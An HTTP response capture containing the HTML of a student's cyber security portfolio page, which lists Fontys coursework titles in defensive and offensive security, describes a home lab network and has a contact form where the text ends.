          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
           <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
           <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
           </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
